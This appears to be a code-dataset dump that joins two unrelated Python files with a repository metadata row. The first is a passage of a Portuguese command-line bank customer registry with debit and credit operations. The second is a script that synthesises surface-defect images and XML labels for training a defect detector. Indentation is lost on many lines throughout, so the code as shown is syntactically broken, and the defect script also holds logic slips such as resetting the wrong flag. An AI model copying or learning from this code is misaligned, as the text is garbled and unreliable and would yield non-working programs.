print ('Conta existente:')
print ('Informe uma nova conta:')
p1.nconta=int(input('>'))
    l.append(p1) # append the new record p1 to the list
if (p1 !=''):
print ('Cadastro realizado com sucesso')
def menu (): # Main menu with the options shown to the user
print()
print ('Digite abaixo a opção que desejar !')
print()
print('1 - Inserir cliente:')
print('2 - Alterar dados de um clientes:')
print('3 - Excluir cliente:')
print('4 - Listar clientes:')
print('5 - Movimento da conta:')
print('6 - Sair')
print ()
x=int(input('Digite a opção:'))
    clear() # clear the screen
    return x
def menu2 (): # Asks whether to repeat the operation or go back to the main menu
print('Digite a opção:')
print('1 - Para realizar novamente a operação')
print('0 - Para voltar ao menu anterior')
print('Digite a operação que deseja realizar')
y = int(input('>'))
    clear() # clear the screen
    return y
def menubusca(): # Search filter menu
print('Digite a opção de filtro desejado')
print('1 - Nome')
print('2 - Sobrenome')
print('3 - CPF')
print('4 - E-mail')
print('5 - Endereço')
print('6 - Telefone')
print('7 - Numero da conta')
print('8 - Limite de credito')
print('9 - Saldo')
bc = int(input('Digite a opção:'))
if(bc == 1):
bc='nome'
if(bc==2):
bc='sobrenome'
if(bc==3):
bc='cpf'
if(bc==4):
bc='email'
if(bc==5):
bc='endereco'
if(bc==6):
bc='telefone'
if(bc==7):
bc='Numero'
if(bc==8):
bc='Limite'
if(bc==9):
bc='saldo'
print('O valor do bc dentro da função é', bc)
return bc
def listcad(l): # Lists the registered customers
print('1 - Para listar todos os cadastros')
print('2 - Para buscar cadastro especifico')
print('Digite a opção desejada')
op = int(input('-->'))
clear()
    if(op == 1): # option 1 lists every registered customer
        for i in range(len(l)): # iterate over the list l
            print('Nome: ', l[i].nome) # print the name stored in the list l
print('Sobre nome: ',l[i].sobrenome)
print('CPF: ',l[i].cpf)
print('E-mail: ',l[i].email)
print('Endereço: ',l[i].endereco)
print('Telefone: ',l[i].telefone)
print('Conta: ',l[i].nconta)
print('Limite: ',l[i].lcredito)
print('Saldo: ',l[i].saldo)
print('------------------------------//----------------------------------')
print()
    else: # option 2 shows the record of a single customer
        print('Digite o CPF que deseja consultar')
        value = int(input('-->'))
        for i in range(len(l)): # iterate over the list l
            if(l[i].cpf == value): # the stored CPF matches the typed CPF
print('Nome: ', l[i].nome)
print('Sobre nome: ',l[i].sobrenome)
print('CPF: ',l[i].cpf)
print('E-mail: ',l[i].email)
print('Endereço: ',l[i].endereco)
print('Telefone: ',l[i].telefone)
print('Conta: ',l[i].nconta)
print('Limite: ',l[i].lcredito)
print('Saldo: ',l[i].saldo)
else:
print('Registro não encontrado')
def dadosaltera (l): # Updates the data of an existing customer
    value = int(input('Digite o CPF que deseja fazer alterações:'))
    for i in range(len(l)): # iterate over the list l
        if(l[i].cpf == value): # the stored CPF matches the typed CPF
p1=cadastro()
p1.nome=input('Nome:')
p1.sobrenome=input('Sobrenome:')
p1.cpf=int(input('CPF:'))
p1.email = input('E-mail:')
p1.endereco = input('Endereço:')
p1.telefone = int(input('Telefone:'))
p1.nconta=input('Numero da conta:')
            p1.lcredito = float(input('Limite de credito aprovado:'))
p1.saldo = float(input('Seu saldo em conta:'))
l[i] = (p1)
if(p1!=''):
print('Dados alterados com sucesso')
def excluiclientes(l): # Deletes a customer record
    value = int(input('Digite o CPF que deseja excluir:'))
    for i in range(len(l)): # iterate over the list l
        if(l[i].cpf == value): # the stored CPF matches the typed CPF
p1 = i
print('1 - Confirmar a exclução dos dados do CPF.',l[p1].nome)
print('0 - Para cancelar a operação')
r = int(input('>'))
if(r == 1):
                del(l[p1]) # remove the customer from the list
def movimentaconta(l): # Handles account movements (debit / credit)
print('Movimentações')
print('1 - Realizar debito')
print('2 - Realizar credito')
op=int(input('Digite a opção:'))
    if(op == 1): # op 1: debit operation
        print('Operação de debito')
        c=int(input('Digite o CPF para fazer o debito:'))
        clear() # clear the screen
        for i in range(len(l)): # iterate over the list l
            if(l[i].cpf == c): # the stored CPF matches the CPF typed now
print('Digite o valor que deseja debitar')
val = float(input('-->'))
                if(l[i].saldo >= val): # the balance covers the requested amount
                    l[i].saldo -= val # subtract the amount from the balance
                    print('Seu saldo atual é de ',round(l[i].saldo))
                    print('Seu limite de credito é de ',round(l[i].lcredito, 2))
                elif(l[i].saldo >= 0): # balance is non-negative but smaller than the amount
                    l[i].saldo -= val # subtract the amount (the result goes negative)
                    l[i].saldo *=-1
                    if(l[i].saldo <= l[i].lcredito): # the shortfall fits within the credit limit
print('Seu saldo esta abaixo do valor informado para debito')
print('O valor de ',round(l[i].saldo, 2) ,'esta sendo debitado do seu limite de credito')
l[i].lcredito -= l[i].saldo
l[i].saldo = 0.00
print('Seu saldo atual é de R$ ',l[i].saldo)
print('Seu limite de credito é de R$ ',round(l[i].lcredito, 2))
else:
clear()
print('operação não foi realizada')
print('Seu saldo + limite esta abaixo do valor informado para debito')
else:
print('CPF informado não foi localizado no sistema')
    if(op == 2): # op 2: credit (deposit) operation
        print('Credito')
        c = int(input('Digite o CPF que deseja realizar a operação:'))
        for i in range(len(l)): # iterate over the list l
            if(l[i].cpf == c): # the stored CPF matches the CPF typed now
                print('Digite o valor que deseja depositar')
                val = float(input('-->'))
                if(l[i].lcredito == 1000): # the credit limit is untouched (still 1000)
                    l[i].saldo += val # add the deposit to the balance
print('Deposito realizado com sucesso')
print('Seu saldo atual é de R$ ',round(l[i].saldo, 2))
print('Seu limite de credito é de R$ ',round(l[i].lcredito, 2))
                elif(l[i].lcredito < 1000 and l[i].lcredito > 0): # part of the credit limit was used up
                    l[i].lcredito += val # the deposit first restores the credit limit
                    if(l[i].lcredito > 1000): # limit fully restored, the remainder goes to the balance
                        val = l[i].lcredito - 1000 # amount exceeding the 1000 limit
                        l[i].lcredito -= val # cap the credit limit back at 1000
                        l[i].saldo += val # add the remainder to the balance
print('Deposito realizado com sucesso')
print('Seu saldo atual é de R$ ',round(l[i].saldo, 2))
print('Seu limite de credito é de R$ ',round(l[i].lcredito, 2))
else:
print('Deposito realizado com sucesso')
print('Seu saldo atual é de R$ ',round(l[i].saldo, 2))
print('Seu limite de credito é de R$ ',round(l[i].lcredito, 2))
else:
print('Operação não realizada, tente novamente mais trade')
else:
print('CPF informado não foi localizado no sistema')
    if(op !=1 and op !=2): # any other option: unknown operation
        print('operação não localizada')
# Main program loop / access control for the main menu
i=1
while(i > 0):
clear()
l = []
opcao=1
    while(opcao != 6): # option 6 exits the program
        opcao = menu()
        subMenu = 1
        if(opcao == 1): # option 1: register customers
            while(subMenu == 1):
                dados(l) # register a customer
                subMenu = menu2()
        elif(opcao == 2): # option 2: update customer data
            while(subMenu == 1):
                dadosaltera(l) # update a customer
                subMenu = menu2()
        elif(opcao == 3): # option 3: delete customers
            while(subMenu == 1):
                excluiclientes(l) # delete a customer
                subMenu = menu2()
        elif(opcao == 4): # option 4: list customers
            while(subMenu == 1):
                listcad(l) # list customers
                subMenu = menu2()
        elif(opcao == 5): # option 5: account movements
            while(subMenu == 1):
                movimentaconta(l) # debit / credit operations
                subMenu = menu2()
        elif(opcao != 6): # anything else counts as an invalid attempt
            i -=1
            print('Credenciais invalidas, você possui mais',i, 'tentativa(s)')
| [
"[email protected]"
] | |
e5b816a271981e5e88da96fe714366af82c5840e | bf64d19174ef332f39e2d8210f3eb4f783262554 | /lib/generate_defect/zlrm_Generate_the_defects_data.py | 75ffb5c6ed53c7e27cde20f4b9f75e40f2a2ca73 | [] | no_license | juzisedefeimao/cv | 3e4dd7deee471321e071ca996769fc3b65481993 | fb9e9292030481f5a26efde4003fb83d37a34962 | refs/heads/master | 2020-05-30T14:29:13.253563 | 2019-06-02T01:08:53 | 2019-06-02T01:08:53 | 189,791,743 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32,276 | py | from PIL import Image
import numpy as np
from time import strftime
import os
import xml.etree.ElementTree as ET
class Generate_Defect():
def __init__(self, save_image_root=None, save_label_root=None, read_label_root=None,
read_defect_root=None, save_fail_label_root=None, save_fail_image_root=None):
self.save_image_root = save_image_root
self.save_label_root = save_label_root
self.read_label_root = read_label_root
self.read_defect_root = read_defect_root
self.fail_label_root = save_fail_label_root
self.fail_image_root = save_fail_image_root
self.scale_random = False
self.ratio_random = False
self.rotate_random = False
self.painting_random = False
self.translation_random = True
        # lists of defect images after each kind of transform
self.defect_image_list = []
self.defect_scale_image_list = []
self.defect_ratio_image_list = []
self.defect_rotate_image_list = []
self.defect_translation_image_list = []
self.defect_painting_image_list = []
        # storage for the generated defects
self.generate_defect_image_list = []
self.defect_affirm = {'class_affirm':False, 'scale_affirm':False, 'ratio_affirm':False,
'rotate_affirm':False, 'painting_affirm':False}
    # read an image file and convert it to an array
def readimage(self, filename, channel=None):
image = np.array(Image.open(filename))
if channel==1:
image = self.image_transform_3_1(image)
elif channel==3:
image = self.image_transform_1_3(image)
return image
    # crop the black borders off an image
    def cutback(self, image, right_left_threshold=80, up_and_down_threshold=80):
        rows, cols = image.shape
        cols_index = cols - 1
        # check column by column whether it can be trimmed
def cut_rl(w_index):
for i in range(rows):
if image[i][w_index] > right_left_threshold:
return False
return True
        # trim the black border on the right
        right_cut_x = cols_index
        while right_cut_x > 0 and cut_rl(right_cut_x):
            right_cut_x = right_cut_x - 1
        if right_cut_x == 0:
            print('image is completely black, cropping failed')
            return False
        image, _ = np.hsplit(image, (right_cut_x + 1,))
        # trim the black border on the left
left_cut_x = 0
print(image.shape)
while cut_rl(left_cut_x):
left_cut_x = left_cut_x + 1
_, image = np.hsplit(image, (left_cut_x - 1,))
rows_, cols_ = image.shape
rows_index = rows_ - 1
        # check row by row whether it can be trimmed
def cut_ud(h_index):
for j in range(cols_):
if image[h_index][j] > up_and_down_threshold:
return False
return True
        # trim the black border at the bottom
down_cut_y = rows_index
while cut_ud(down_cut_y):
down_cut_y = down_cut_y - 1
image, _ = np.split(image, (down_cut_y + 1,), axis=0)
        # trim the black border at the top
up_cut_y = 0
while cut_ud(up_cut_y):
up_cut_y = up_cut_y + 1
_, image = np.split(image, (up_cut_y - 1,), axis=0)
        print('left cut', left_cut_x, 'px; ', 'right cut', cols_index - right_cut_x, 'px;',
              'top cut', up_cut_y, 'px; ', 'bottom cut', rows_index - down_cut_y, 'px;')
return image
    # convert a single-channel image to a 3-channel image
    def image_transform_1_3(self, image):
        assert len(image.shape) in (2, 3), 'image is neither 3-channel nor single-channel'
if len(image.shape) == 2:
c = []
for i in range(3):
c.append(image)
image = np.asarray(c)
image = image.transpose([1, 2, 0])
elif len(image.shape)==3:
            print('image is already 3-channel, no conversion needed')
        return image
    # convert a 3-channel image to a single-channel image
    def image_transform_3_1(self, image):
        assert len(image.shape) in (2, 3), 'image is neither 3-channel nor single-channel'
if len(image.shape) == 3:
image_2 = np.zeros((image.shape[0], image.shape[1]), dtype=np.uint8)
            # grayscale method 2: luminance from the RGB components: Y=0.3*R+0.59*G+0.11*B
h, w, color = image.shape
for i in range(h):
for j in range(w):
image_2[i][j] = np.uint8(0.3 * image[i][j][0] + 0.59 * image[i][j][1] + 0.11 * image[i][j][2])
image = image_2
            assert len(image.shape) == 2, 'failed to convert the 3-channel image to single-channel'
        elif len(image.shape) == 2:
            print('image is already single-channel, no conversion needed')
        return image
    # save an image to disk
def saveimage(self, image, saveimage_name=None, image_ext='bmp', saveimage_root=None):
if len(image.shape)==2:
image = self.image_transform_1_3(image)
if saveimage_name is None:
saveimage_name = 'image_{}'.format(strftime("%Y_%m_%d_%H_%M_%S")) + '.' + image_ext
else:
saveimage_name = saveimage_name + '.' + image_ext
if saveimage_root is None:
saveimage_root = 'C:\\Users\\jjj\\Desktop\\jjj\\zlrm\\data\\default_root'
            print('no image save path was set, saving to the default _{}'.format(saveimage_root))
if not os.path.isdir(saveimage_root):
os.makedirs(saveimage_root)
root = os.path.join(saveimage_root, str(saveimage_name))
image = Image.fromarray(image)
image.save(root)
    # save the label as an XML annotation
def savelabel(self, boxes, labelfile, savelabel_name=None, savelabel_root=None):
tree = ET.parse(labelfile)
root = tree.getroot()
if savelabel_name is None:
            savelabel_name = 'box_{}'.format(strftime("%Y_%m_%d_%H_%M_%S")) + '.' + 'xml'
else:
savelabel_name = savelabel_name + '.' + 'xml'
if savelabel_root is None:
savelabel_root = 'C:\\Users\\jjj\\Desktop\\jjj\\zlrm\\data\\default_root'
            print('no save path for the boxes was set, saving to the default _{}'.format(savelabel_root))
        for i in range(len(boxes)):
            # level 1 element
            object = ET.Element('object')
            # level 2 elements
name = ET.Element('name')
name.text = boxes[i]['name']
pose = ET.Element('pose')
pose.text = 'Unspecified'
truncated = ET.Element('truncated')
truncated.text = '0'
difficult = ET.Element('difficult')
difficult.text = '1'
bndbox = ET.Element('bndbox')
            # level 3 elements
xmin = ET.Element('xmin')
xmin.text = str(boxes[i]['xmin'])
ymin = ET.Element('ymin')
ymin.text = str(boxes[i]['ymin'])
xmax = ET.Element('xmax')
xmax.text = str(boxes[i]['xmax'])
ymax = ET.Element('ymax')
ymax.text = str(boxes[i]['ymax'])
            # attach the nodes to the tree
bndbox.append(xmin)
bndbox.append(ymin)
bndbox.append(xmax)
bndbox.append(ymax)
object.append(name)
object.append(pose)
object.append(truncated)
object.append(difficult)
object.append(bndbox)
root.append(object)
savelabel = os.path.join(savelabel_root, savelabel_name)
tree.write(savelabel)
    # generate a pure white image
def generate_white_image(self, shape=(600,600)):
image = np.zeros(shape, dtype=np.uint8)
h, w = image.shape
for i in range(h):
for j in range(w):
image[i][j] = np.uint8(255)
return image
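    # Added note: the pixel loop above is equivalent to the vectorised one-liner
    # np.full(shape, 255, dtype=np.uint8), which is much faster for large canvases.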
    # clear any leftover lists
def clean_list(self):
if self.defect_affirm['class_affirm']:
self.defect_image_list = []
self.defect_affirm['class_affirm'] = False
if self.defect_affirm['scale_affirm']:
self.defect_scale_image_list = []
self.defect_affirm['scale_affirm'] = False
if self.defect_affirm['ratio_affirm']:
self.defect_ratio_image_list = []
self.defect_affirm['ratio_affirm'] = False
if self.defect_affirm['rotate_affirm']:
self.defect_rotate_image_list = []
self.defect_affirm['ratio_affirm'] = False
if self.defect_affirm['painting_affirm']:
self.defect_painting_image_list = []
self.defect_affirm['painting_affirm'] = False
    # Randomly generate some defects for an image
def generate_defects(self, image, labelfile, freehand_sketching = False, save_name=None):
if save_name==None:
save_name = len(os.listdir(self.save_image_root))
            save_name = str(save_name + 1)
if len(self.generate_defect_image_list)==0:
for file in os.listdir(self.read_defect_root):
if freehand_sketching and file == 'freehand_sketching':
freehand_sketching_folder_root = os.path.join(self.read_defect_root, 'freehand_sketching')
for freehand_sketching_file in os.listdir(freehand_sketching_folder_root):
freehand_sketching_image_root = os.path.join(freehand_sketching_folder_root,
freehand_sketching_file)
freehand_sketching_image = self.readimage(freehand_sketching_image_root)
self.get_defect_freehand_sketching(freehand_sketching_image)
elif file == 'paint_smear':
paint_smear_folder_root = os.path.join(self.read_defect_root, 'paint_smear')
for paint_smear_file in os.listdir(paint_smear_folder_root):
paint_smear_image_root = os.path.join(paint_smear_folder_root, paint_smear_file)
paint_smear_image = self.readimage(paint_smear_image_root)
self.get_defect_paint_smear(paint_smear_image)
elif file == 'aluminium_skimmings':
aluminium_skimmings_folder_root = os.path.join(self.read_defect_root, 'aluminium_skimmings')
for aluminium_skimmings_file in os.listdir(aluminium_skimmings_folder_root):
aluminium_skimmings_image_root = os.path.join(aluminium_skimmings_folder_root,
aluminium_skimmings_file)
aluminium_skimmings_image = self.readimage(aluminium_skimmings_image_root)
self.get_defect_aluminium_skimmings(aluminium_skimmings_image)
# else:
# raise KeyError('未知的缺陷', file)
# self.random_defect()
defect_image_list = self.defect_image_list
if self.scale_random:
self.defect_scale(defect_image_list)
defect_image_list = self.defect_scale_image_list
if self.ratio_random:
self.defect_ratio(defect_image_list)
defect_image_list = self.defect_ratio_image_list
if self.rotate_random:
self.defect_rotate(defect_image_list)
defect_image_list = self.defect_rotate_image_list
if self.painting_random:
self.defect_painting(defect_image_list)
defect_image_list = self.defect_painting_image_list
self.generate_defect_image_list = defect_image_list
self.clean_list()
defect_image_list = self.generate_defect_image_list
print('生成的缺陷还有', len(defect_image_list))
if self.translation_random:
fetch = self.defect_translation(image, defect_image_list, labelfile)
if fetch == None:
print('输出未合成的label和image')
tree = ET.parse(labelfile)
save_xml_root = os.path.join(self.fail_label_root, save_name + '.xml')
tree.write(save_xml_root)
self.saveimage(image, saveimage_name=save_name, saveimage_root=self.fail_image_root)
else:
image = fetch[0]
boxes = fetch[1]
self.saveimage(image, saveimage_name=save_name, saveimage_root=self.save_image_root)
self.savelabel(boxes, labelfile, savelabel_name=save_name, savelabel_root=self.save_label_root)
def judge_vein_exist(self, file):
tree = ET.parse(file)
vein_exist = False
for obj in tree.findall('object'):
if obj.find('name').text == 'vein':
vein_exist = True
return vein_exist
    # Generate defects for a batch of images
def generate_defect_batch(self, batch_data_root=None):
for labelfile in os.listdir(self.read_label_root):
if labelfile.split('.')[-1] == 'xml':
print('为图片 ', labelfile.split('.')[0], ' 生成缺陷')
image_root = os.path.join(batch_data_root, labelfile.split('.')[0] + '.bmp')
image = self.readimage(image_root, channel=1)
# image = self.cutback(image)
h, w = image.shape
label_root = os.path.join(self.read_label_root, labelfile)
if h > 200 and w > 200 and h / w < 4.4 and w / h < 4.4:
if self.judge_vein_exist(label_root):
self.generate_defects(image, label_root, save_name=labelfile.split('.')[0])
print('已生成', len(os.listdir(self.save_image_root)), '个图片')
else:
tree = ET.parse(label_root)
save_xml_root = os.path.join(self.save_label_root, labelfile.split('.')[0])
tree.write(save_xml_root)
self.saveimage(image, saveimage_name=labelfile.split('.')[0], saveimage_root=self.save_image_root)
def preload_defect(self, preload_defect_root, freehand_sketching = False):
for file in os.listdir(preload_defect_root):
if freehand_sketching and file == 'freehand_sketching':
freehand_sketching_folder_root = os.path.join(preload_defect_root, 'freehand_sketching')
for freehand_sketching_file in os.listdir(freehand_sketching_folder_root):
freehand_sketching_image_root = os.path.join(freehand_sketching_folder_root,
freehand_sketching_file)
freehand_sketching_image = self.readimage(freehand_sketching_image_root)
image = self.get_defect_freehand_sketching(freehand_sketching_image)
if image is not None:
self.saveimage(image, saveimage_name=freehand_sketching_file.split('.')[0],
saveimage_root=os.path.join(self.read_defect_root, 'freehand_sketching'))
elif file == 'paint_smear1':
paint_smear_folder_root = os.path.join(preload_defect_root, 'paint_smear')
for paint_smear_file in os.listdir(paint_smear_folder_root):
paint_smear_image_root = os.path.join(paint_smear_folder_root, paint_smear_file)
paint_smear_image = self.readimage(paint_smear_image_root)
image = self.get_defect_paint_smear(paint_smear_image, preload=True)
if image is not None:
self.saveimage(image, saveimage_name=paint_smear_file.split('.')[0],
saveimage_root=os.path.join(self.read_defect_root, 'paint_smear'))
elif file == 'aluminium_skimmings':
aluminium_skimmings_folder_root = os.path.join(preload_defect_root, 'aluminium_skimmings')
for aluminium_skimmings_file in os.listdir(aluminium_skimmings_folder_root):
aluminium_skimmings_image_root = os.path.join(aluminium_skimmings_folder_root,
aluminium_skimmings_file)
aluminium_skimmings_image = self.readimage(aluminium_skimmings_image_root)
image = self.get_defect_aluminium_skimmings(aluminium_skimmings_image, preload=True)
if image is not None:
self.saveimage(image, saveimage_name=aluminium_skimmings_file.split('.')[0],
saveimage_root=os.path.join(self.read_defect_root, 'aluminium_skimmings'))
    # Get a hand-drawn (freehand sketching) defect
def get_defect_freehand_sketching(self, image):
if len(image.shape)==3:
image = self.image_transform_3_1(image)
assert len(image.shape)==2, '图片不能转为单通道'
h, w = image.shape
for i in range(h):
for j in range(w):
if image[i][j]>200:
image[i][j] = 0
else:
image[i][j] = 255
image = self.cutback(image)
if image is not False:
print('读取缺陷完成')
self.defect_image_list.append({'name': 'freehand_sketching', 'image': image})
# print(len(self.defect_image))
self.defect_affirm['class_affirm'] = True
return image
    # Get a paint-smear defect
def get_defect_paint_smear(self, image, preload=False):
if len(image.shape) == 3:
image = self.image_transform_3_1(image)
assert len(image.shape) == 2, '图片不能转为单通道'
h, w = image.shape
for i in range(h):
for j in range(w):
if image[i][j] > 75:
image[i][j] = 0
image = self.cutback(image, right_left_threshold=1, up_and_down_threshold=1)
if image is not False:
h, w = image.shape
if preload:
for i in range(h):
for j in range(w):
if image[i][j] == 0:
image[i][j] = 255
print('读取缺陷完成')
self.defect_image_list.append({'name': 'paint_smear', 'image': image})
# print(len(self.defect_image))
self.defect_affirm['class_affirm'] = True
return image
    # Get an aluminium-skimmings defect
def get_defect_aluminium_skimmings(self, image, preload=False):
if len(image.shape) == 3:
image = self.image_transform_3_1(image)
assert len(image.shape) == 2, '图片不能转为单通道'
h, w = image.shape
for i in range(h):
for j in range(w):
if image[i][j] > 80:
image[i][j] = 0
image = self.cutback(image, right_left_threshold=1, up_and_down_threshold=1)
if image is not False:
h, w = image.shape
if preload:
for i in range(h):
for j in range(w):
if image[i][j] == 0:
image[i][j] = 255
print('读取缺陷完成')
self.defect_image_list.append({'name': 'aluminium_skimmings', 'image': image})
# print(len(self.defect_image))
self.defect_affirm['class_affirm'] = True
return image
    # Randomly generate a defect
def random_defect(self, p_threshold=0.5):
        # grow outwards at random from a single starting point according to a probability distribution
h = 0
w = 0
while h < 100 and w < 100:
image = np.zeros((401, 401), dtype=np.uint8)
h, w = image.shape
image[0][0] = 255
for i in range(h):
for j in range(i + 1):
if j - 1 >= 0:
if image[j - 1][i - j] == 255:
if np.random.rand() < p_threshold:
image[j][i - j] = 255
if i - j - 1 >= 0:
if image[j][i - j - 1] == 255:
if np.random.rand() < p_threshold:
image[j][i - j] = 255
if j - 1 >= 0 and i - j - 1 >= 0:
if image[j - 1][i - j - 1] == 255:
if np.random.rand() < p_threshold:
image[j][i - j] = 255
image = self.cutback(image)
h, w = image.shape
# h = 0
# w = 0
# while h < 100 and w < 100:
# image_ = np.zeros((401, 401), dtype=np.uint8)
# h, w = image_.shape
# image_[400][400] = 255
# for i in range(h):
# for j in range(i + 1):
# if j - 1 >= 0:
# if image_[400 - j + 1][400 - i + j] == 255:
# if np.random.rand() < p_threshold:
# image_[400 - j][400 - i + j] = 255
# if i - j - 1 >= 0:
# if image_[400 - j][400 - i + j + 1] == 255:
# if np.random.rand() < p_threshold:
# image_[400 - j][400 - i + j] = 255
# if j - 1 >= 0 and i - j - 1 >= 0:
# if image_[400 - j + 1][400 - i + j + 1] == 255:
# if np.random.rand() < p_threshold:
# image_[400 - j][400 - i + j] = 255
# image_ = self.cutback(image_)
# h, w = image_.shape
self.defect_image_list.append(image)
# print(len(self.defect_image))
self.defect_affirm['class_affirm'] = True
self.saveimage(image, saveimage_name='jjj')
    # Random colouring scheme: pick a grey-value range according to painting_schem
    def painting_random_fetch(self, painting_schem=None):
        if painting_schem == 1:
            painting = np.random.randint(1, 50)
        elif painting_schem == 2:
            painting = np.random.randint(70, 120)
        elif painting_schem == 3:
            painting = np.random.randint(150, 255)
        else:
            painting = np.random.randint(1, 255)
        return painting
    # Fill the inside of the curve with colour
def defect_painting(self, defect_image_list):
defect_data = defect_image_list
for n in range(len(defect_data)):
image = defect_data[n]['image']
h, w = image.shape
for p in range(np.random.randint(3,5)):
                # painting_schem is the randomly drawn colouring scheme; there are 3 preset schemes
painting_schem = np.random.randint(1, 5)
painting = 1
if painting_schem < 4:
painting = self.painting_random_fetch(painting_schem=painting_schem)
for i in range(h):
left_ = 0
left_2 = 0
right_ = 0
switch = 0
j = 0
while j < w:
left_2 = j
while j < w and image[i][j] == 0:
j = j + 1
left_ = j
while j < w and image[i][j] != 0:
j = j + 1
right_ = j
if left_ != right_:
if switch == 0:
switch = 1
switch = (-1)*switch
if switch == 1:
left_ = left_2
for k in range(left_, right_):
                                if painting_schem == 4:
                                    image[i][k] = np.random.randint(1, 255)
                                else:
                                    image[i][k] = painting
self.defect_painting_image_list.append({'name':defect_data[n]['name'], 'image':image})
self.defect_affirm['painting_affirm'] = True
    # Rotate the defects
def defect_rotate(self, defect_image_list):
defect_data = defect_image_list
for n in range(len(defect_data)):
image = defect_data[n]['image']
for s in range(np.random.randint(3, 5)):
rotation_angle = np.random.randint(0, 360)
image = Image.fromarray(image.astype(np.uint8))
image = image.rotate(rotation_angle)
image = np.array(image)
self.defect_rotate_image_list.append({'name':defect_data[n]['name'], 'image':image})
self.defect_affirm['rotate_affirm'] = True
    # Read the defect boxes for the corresponding ingot-surface image from the xml file, split into defects and veins (texture)
def get_defectbox_from_xml(self, xlm_filename):
tree = ET.parse(xlm_filename)
obj_box = []
vein_box = []
for obj in tree.findall('object'):
if obj.find('name').text == 'vein':
bbox = obj.find('bndbox')
box = [int(bbox.find('xmin').text),
int(bbox.find('ymin').text),
int(bbox.find('xmax').text),
int(bbox.find('ymax').text)]
vein_box.append(box)
else:
bbox = obj.find('bndbox')
box = [int(bbox.find('xmin').text),
int(bbox.find('ymin').text),
int(bbox.find('xmax').text),
int(bbox.find('ymax').text)]
obj_box.append(box)
return obj_box, vein_box
    # Choose a location to place the defect and return the minimum h, w coordinates
def select_defect_loacte(self, obj_box, vein_box, defect_size):
        # number of attempts at finding a location
find_num = 0
vein = vein_box[np.random.randint(0, len(vein_box))]
locate = []
locate.append(np.random.randint(vein[1] + 1, vein[3] - defect_size[0]))#h
locate.append(np.random.randint(vein[0] + 1, vein[2] - defect_size[1]))#w
while self.judge_inter(obj_box, locate, defect_size) and find_num<300:
locate[0] = np.random.randint(vein[1] + 1, vein[3] - defect_size[0])
locate[1] = np.random.randint(vein[0] + 1, vein[2] - defect_size[1])
find_num = find_num + 1
if find_num < 300:
return locate
else:
print('获取位置失败')
return None
    # Check whether the chosen box intersects any box in obj_box
def judge_inter(self, obj_box, locate, defect_size):
defect_box = [locate[0], locate[1], locate[0] + defect_size[1], locate[1] + defect_size[0]]
defect_box = np.array(defect_box)
obj_box = np.array(obj_box)
if len(obj_box) == 0:
inters = 0
elif len(obj_box) == 1:
ixmin = np.maximum(obj_box[0, 0], defect_box[0])
iymin = np.maximum(obj_box[0, 1], defect_box[1])
ixmax = np.minimum(obj_box[0, 2], defect_box[2])
iymax = np.minimum(obj_box[0, 3], defect_box[3])
iw = np.maximum(ixmax - ixmin + 1., 0.)
ih = np.maximum(iymax - iymin + 1., 0.)
inters = iw * ih
else:
ixmin = np.maximum(obj_box[:, 0], defect_box[0])
iymin = np.maximum(obj_box[:, 1], defect_box[1])
ixmax = np.minimum(obj_box[:, 2], defect_box[2])
iymax = np.minimum(obj_box[:, 3], defect_box[3])
iw = np.maximum(ixmax - ixmin + 1., 0.)
ih = np.maximum(iymax - iymin + 1., 0.)
inters = iw * ih
print('inters', inters, np.sum(np.array(inters) <= 0), (np.array(inters)).size)
if np.sum(np.array(inters) <= 0) == (np.array(inters)).size:
return False
else:
return True
    # Translate (place) the defects onto the image
def defect_translation(self, image, defect_image_list, filename):
        # get the defect boxes and the vein (texture) boxes
obj_box, vein_box = self.get_defectbox_from_xml(filename)
h, w = image.shape
# print(len(defect_image))
assert len(defect_image_list)>0, '未生成缺陷,不能与样本合成有缺陷的样本'
boxes = []
high = min(len(defect_image_list), 4)
low = 1
if len(defect_image_list)>=2:
low = 2
defect_image_fetch = np.random.randint(low=0, high=len(defect_image_list), size=np.random.randint(low, high+1))
defect_image_fetch = list(defect_image_fetch)
defect_image_fetch = list(set(defect_image_fetch))
defect_image_fetch.sort(reverse=True)
for n in defect_image_fetch:
defect_image_ = defect_image_list[n]['image']
defect_size = defect_image_.shape
# print(defect_image_.shape)
locate = self.select_defect_loacte(obj_box, vein_box, defect_size)#h,w
if locate == None :
return None
else:
for i in range(defect_size[0]):
for j in range(defect_size[1]):
if defect_image_[i][j] != 0:
image[i + locate[0]][j + locate[1]] = defect_image_[i][j]
box = {'name':defect_image_list[n]['name'], 'xmin': locate[1] - 1, 'ymin': locate[0] - 1,
'xmax': locate[1] + defect_size[1] + 1, 'ymax': locate[0] + defect_size[0] + 1}
print(locate)
print('defectsize',defect_size)
print('box',box)
boxes.append(box)
                defect_box = [locate[1] - 1, locate[0] - 1, locate[1] + defect_size[1] + 1,
                              locate[0] + defect_size[0] + 1]
obj_box.append(defect_box)
for i in range(len(defect_image_fetch)):
defect_image_list.pop(defect_image_fetch[i])
return image, boxes
    # Draw a random number from a preset distribution and use it as the size of the defect image
def scale_random_fetch(self):
p = np.random.randint(0,10)
if p < 2:
size = np.random.randint(8,20)
elif p < 4:
size = np.random.randint(20,40)
elif p < 6:
size = np.random.randint(40,60)
elif p < 8:
size = np.random.randint(60,80)
else:
size = np.random.randint(80,100)
return size
    # Rescale the defects
def defect_scale(self, defect_image_list):
defect_data = defect_image_list
for n in range(len(defect_data)):
image = defect_data[n]['image']
for s in range(np.random.randint(3, 5)):
size = self.scale_random_fetch()
image = Image.fromarray(image.astype(np.uint8))
image = image.resize((size, size), Image.ANTIALIAS)
image = np.array(image)
self.defect_scale_image_list.append({'name':defect_data[n]['name'], 'image':image})
self.defect_affirm['scale_affirm'] = True
    # Change the height/width aspect ratio of the defects
def defect_ratio(self, defect_image_list):
defect_data = defect_image_list
for n in range(len(defect_data)):
image = defect_data[n]['image']
h, w = image.shape
for s in range(np.random.randint(3, 5)):
h_, w_ = np.random.randint(1,11,size=2)
size_h = np.int(np.sqrt((h * w) / (h_ * w_)) * h_) + 1
size_w = np.int(np.sqrt((h * w) / (h_ * w_)) * w_) + 1
image = Image.fromarray(image.astype(np.uint8))
image = image.resize((size_h, size_w), Image.ANTIALIAS)
image = np.array(image)
self.defect_ratio_image_list.append({'name':defect_data[n]['name'], 'image':image})
self.defect_affirm['ratio_affirm'] = True
if __name__ == '__main__':
# k = []
datadir = 'H:\\defect\\paint_smear'
ga = Generate_Defect()
for imagefile in os.listdir(datadir):
imageroot = os.path.join(datadir, imagefile)
image = ga.readimage(imageroot, channel=3)
# print(image)
image = ga.get_defect_paint_smear(image)
name = imagefile + 'k'
